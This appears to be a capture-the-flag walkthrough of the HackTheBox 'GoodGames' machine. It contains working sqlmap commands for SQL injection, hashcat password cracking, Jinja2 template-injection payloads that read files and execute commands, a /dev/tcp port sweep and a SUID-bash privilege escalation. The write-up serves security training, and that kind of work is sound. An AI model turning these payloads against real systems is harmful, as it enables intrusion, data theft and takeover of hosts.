We begin with nmap
as usual.
nmap $ip -sV
We get some open ports
This time, we get an only open port which is 80
. The only attack vector we have is via HTTP
We begin by adding goodgames.htb
to our /etc/hosts
sudo nano /etc/hosts
We run a directory brute forcing
in the background.
gobuster dir -u="http://goodgames.htb" -w=/usr/share/seclists/SecLists-master/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php.bak,html,txt,zip,sh --exclude-length 9265
We are welcomed with this index
We can see a login/signup
We register
an account.
We Login
Intercepting the request
, we can see session cookie
It seems to be a JWT
A lot of attack vectors are present that we can try.
Whenever we try to change anything in the token, it gives us error 500
Lets try SQL injection
payloads on the signup
and login
page. Changing the email
field with a SQL injection
We get a response Welcome adminxtromera
seems that the payload worked. Giving the rest to sqlmap
sqlmap -r req --level 3 --risk 3 --batch
We get 2 databases
We can focus on the main
database as the other is a common database in MYSQL
sqlmap -r req --batch -D main --tables
We can try to fetch the user
sqlmap -r req --batch -D main -T user --dump
We crack
the hash
using hashcat
hashcat hash /usr/share/wordlists/rockyou.txt -m 0
The password
is cracked.
Now we can login as Administrator
We can see a Gear
button on the top right. Clicking on it, we are redirected to http://internal-administration.goodgames.htb/
We can add it to /etc/hosts
and refresh the page.
We login with credentials admin:superadministrator
We find in the settings that we can update our General information http://internal-administration.goodgames.htb/settings
This website is powered by Flask volt
as it is a python
library. Maybe it is vulnerable to SSTI
. We can try some payloads to test for the vulnerability.
We can see using this payload {{7*7}} that we get an output of 49
meaning the code was handled by the backend
server and the form is vulnerable.
The output reveals that the template used is 90% Jinja2
so we can continue our payloads based on this guess.
We can use a payload to read local files
on the system.
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
We get a hit.
Now we can use an RCE
{{ cycler.__init__.__globals__.os.popen('id').read() }}
we get a nice output.
We can see us being root
so must propably a container.
We can now execute our rev shell
We get a hit.
This seems to be a container
We are now sure to be in a Docker
A quick host sweep
, we check for live hosts.
for ip in {1..254}; do ping -c 1 172.19.0.$ip | grep "64 bytes";done
We get 2
live hosts, our and another one
Now we do a port
sweep to check open ports.
for port in {1..65535}; do (echo > /dev/tcp/$port) >/dev/null 2>&1 && echo "Port $port is open"; done
We get some ports open.
We saw when enumerating in the /home
directory a directory called augustus
although the user is not present in the /etc/passwd
file so this means that the /home
directory is mounted from the original host
machine on the docker container.
As we are root
, and the port 22
is open on the host machine, SSH
is available so we can ssh
to the host machine by abusing the write permissions we have in the home
directory of the user and authenticate via private RSA key
ssh-keygen -t rsa -b 4096 -f ./id_rsa
Now we can SSH
to the host.
If we remember, the /home/augustus
directory is mounted on the docker
where we have root
We can copy /bin/bash
file to the home directory of the user, add the SUID
privilege and let augustus
executes it in goodgames
Doing so, we get an error but because we where trying to copy the /bin/bash
file from the container to the host but it will work if we copied the bash
file from the host directly.
The machine was pawned